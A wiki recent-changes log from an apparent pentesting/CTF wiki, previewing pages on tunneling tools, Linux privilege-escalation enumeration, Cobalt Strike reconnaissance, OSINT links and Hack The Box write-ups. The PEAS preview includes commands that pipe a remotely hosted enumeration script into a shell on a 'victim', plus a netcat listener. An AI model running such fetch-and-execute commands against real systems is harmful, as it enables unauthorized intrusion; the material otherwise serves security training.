Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 14:27, 21 February 2023 Ali3nw3rx talk contribs created page Chisel (Created page with "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. <syntaxhighlight lang=powershell> $ chisel --help Usage: chisel [command] [--help] Version: X.Y.Z Commands: server - runs chisel in server mode client - runs chisel in client mod...") Tag: Visual edit: Switched
- 13:10, 21 February 2023 Ali3nw3rx talk contribs created page Linux Smart Enumeration - LSE (Created page with "==linux-smart-enumeration== Linux enumeration tools for pentesting and CTFs This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests. Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view. Download: <syntaxhighlight lang=powershell> Use: ./lse.sh [options] OPTIONS -c Disable color -i Non interactive mode -h This help -l LEVEL...") Tag: Visual edit: Switched
- 11:25, 21 February 2023 Ali3nw3rx talk contribs created page PSPY (Created page with " pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea. The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch sho...")
- 10:04, 21 February 2023 Ali3nw3rx talk contribs created page Privilege Escalation Check List - Linux (Created page with "Category:Privilege Escalation") Tag: Visual edit: Switched
- 09:45, 21 February 2023 Ali3nw3rx talk contribs created page PEAS (Created page with "Category:Tools Category:Reconnaissance ==Latest Releases== <syntaxhighlight lang=powershell> https://github.com/carlospolop/PEASS-ng/releases/tag/20230219 </syntaxhighlight> ==Quick Start LinPeas== <syntaxhighlight lang=powershell> # From github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Local network sudo python -m http.server 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl sudo nc -q 5 -lvnp 8...")
- 14:31, 13 February 2023 SourMilk talk contribs created page Cobalt Strike:Host Reconnaissance (Created page with "Category:Cobalt Strike ==Background== Prior to executing any post-exploitation steps, it is imperative for red teamers to assess the target system's security measures. This involves gathering information about the presence of antivirus (AV) software, endpoint detection and response (EDR) solutions, Windows audit policies, PowerShell logging, event forwarding, and other security-related components. Host reconnaissance serves as an important factor in determining the...")
- 14:22, 13 February 2023 SourMilk talk contribs created page Category:Cobalt Strike (Created page with "Category:Command and Control")
- 15:56, 5 February 2023 Ali3nw3rx talk contribs uploaded File:Subnet3.png
- 15:56, 5 February 2023 Ali3nw3rx talk contribs created page File:Subnet3.png
- 15:55, 5 February 2023 Ali3nw3rx talk contribs uploaded File:Subnet2.png
- 15:55, 5 February 2023 Ali3nw3rx talk contribs created page File:Subnet2.png
- 15:53, 5 February 2023 Ali3nw3rx talk contribs created page Subnetting (Created page with "center|frameless|1000x1000px") Tag: Visual edit
- 15:52, 5 February 2023 Ali3nw3rx talk contribs uploaded File:Subnet1.png
- 15:52, 5 February 2023 Ali3nw3rx talk contribs created page File:Subnet1.png
- 15:47, 5 February 2023 Ali3nw3rx talk contribs created page Nishang (Created page with "Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. By Nikhil Mittal Founder of Altered Security - Hands-on red team and enterprise security training!<ref>https://github.com/samratashok/nishang</ref><syntaxhighlight lang="powershell"> ## Git Repo https://github.com/samratashok/nishang </syntaxhighlight> <r...") Tag: Visual edit
- 15:32, 5 February 2023 Ali3nw3rx talk contribs created page OSINT (Created page with "Category:Reconnaissance ==Useful Links== <syntaxhighlight lang=powershell> ## Links https://osintcurio.us https://www.osint.games https://osintframework.com http://hunter.io http://pimeyes.com http://phonebook.cz http://email-checker.net http://emailhippo.com ## Plugins clearbit - company lnfo lookup # Chrome Extension ## Data Breaches https://dehashed.com https://alternativeto.net/tag/data-breach https://haveibeenpwned.com https://whatsmyname.app https://kik.m...") Tag: Visual edit: Switched
- 14:47, 5 February 2023 SourMilk talk contribs created page BroScience (Created page with "category:Medium ==Box Information== Network: Hack The Box Operating System: Linux Release Date: 7 January 2023 Creator: [https://app.hackthebox.com/users/485051 bmdyy] Difficulty: Medium Points: 30 ==Enumeration== ===Nmap=== <syntaxhighlight lang="powershell"> # Nmap 7.93 scan initiated Thu Jan 26 19:36:36 2023 as: nmap -sCV -oA nmap/broscience 10.129.5.153 Nmap scan report for 10.129.5.153 Host is up (0.077...") Tag: Visual edit: Switched
- 17:36, 1 February 2023 Ali3nw3rx talk contribs created page DS Store (Created page with "Category:Reconnaissance ==About .ds_stores== .DS_Store files contain records of the different properties (fields) of the files or directories of the directory of .DS_Store. These fields can specify things like modification dates, icons, backgrounds, comments, etc. This program parses, displays, and explains all the fields currently known in .DS_Store. (There's a lot!) <syntaxhighlight> sudo git clone https://github.com/HanwenZhu/.DS_Store-parser cd .DS_Store-parser...")
- 15:27, 31 January 2023 SourMilk talk contribs created page Fortress:Faraday (Created page with " Category:HackTheBox ==Description== ==Flag 1== ===Nmap=== <syntaxhighlight lang="powershell"> # Nmap 7.93 scan initiated Tue Jan 31 13:08:36 2023 as: nmap -sCV -oA nmap/10.13.37.14 10.13.37.14 Nmap scan report for 10.13.37.14 Host is up (0.15s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 a80553aeb18d...") Tag: Visual edit: Switched
- 14:19, 30 January 2023 SourMilk talk contribs created page Rpivot (Created page with "Category:Tools Category:Tunneling & Port Forwarding ==Description== RPIVOT is a tool that provides secure and flexible access to an internal network by tunneling traffic through a SOCKS 4 proxy. It operates in the opposite direction of SSH dynamic port forwarding, allowing you to pivot into an internal network from an external system. RPIVOT provides a convenient way to bypass network restrictions and gain access to internal resources without the need for direct...") Tag: Visual edit: Switched
- 13:44, 30 January 2023 SourMilk talk contribs created page Sshuttle (Created page with "category:Tools ==Description== Sshuttle<ref>https://github.com/sshuttle/sshuttle</ref> is a free, open-source software tool that allows you to securely access network resources behind a firewall or router, by creating a VPN (Virtual Private Network) connection over an existing SSH (Secure Shell) connection. sshuttle works by forwarding all network traffic from your local machine to the remote network via an encrypted SSH tunnel, effectively bypassing any firewalls...") Tag: Visual edit: Switched
- 13:27, 30 January 2023 SourMilk talk contribs created page Plink.exe (Created page with "Category:Tools Category:Tunneling & Port Forwarding ==Description== PuTTY Link (Plink) is a command-line connection tool for Windows that is used for connecting to a remote computer using the Telnet and Secure Shell (SSH) network protocols. It is part of the PuTTY suite of tools, which also includes the PuTTY terminal emulator and the PuTTY Configuration Utility. Plink is commonly used to automate routine tasks, such as executing shell commands on a remote server...") Tag: Visual edit: Switched
- 13:14, 30 January 2023 SourMilk talk contribs created page Category:Tunneling & Port Forwarding (Created page with "Category:Command and Control ==Description== Tunneling and port forwarding are both techniques used in red teaming, a type of simulated cyber attack used to test an organization's security defenses. Tunneling involves creating a secure connection between two networked devices, allowing data to be transmitted between them even if they are behind a firewall or in different parts of the world. Port forwarding, on the other hand, is a method of redirecting incoming netwo...")
- 12:38, 30 January 2023 SourMilk talk contribs created page Socat (Created page with "Category:Tools ==Description== socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named p...") Tag: Visual edit: Switched
- 21:38, 28 January 2023 SourMilk talk contribs created page Encoding (Created page with "Category:Medium ==Box Information== Network: Hack The Box Operating System: Linux Release Date: 28 January 2023 Creator: [https://app.hackthebox.com/users/389926 kavigiha] Difficulty: Medium Points: 30 ==Enumeration==")
- 13:52, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:45, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:45, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:45, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:45, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:45, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:45, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:44, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:43, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:43, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:43, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:42, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:42, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:42, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:42, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:42, 28 January 2023 (username removed) (log details removed) (edit summary removed)
- 13:42, 28 January 2023 (username removed) (log details removed) (edit summary removed)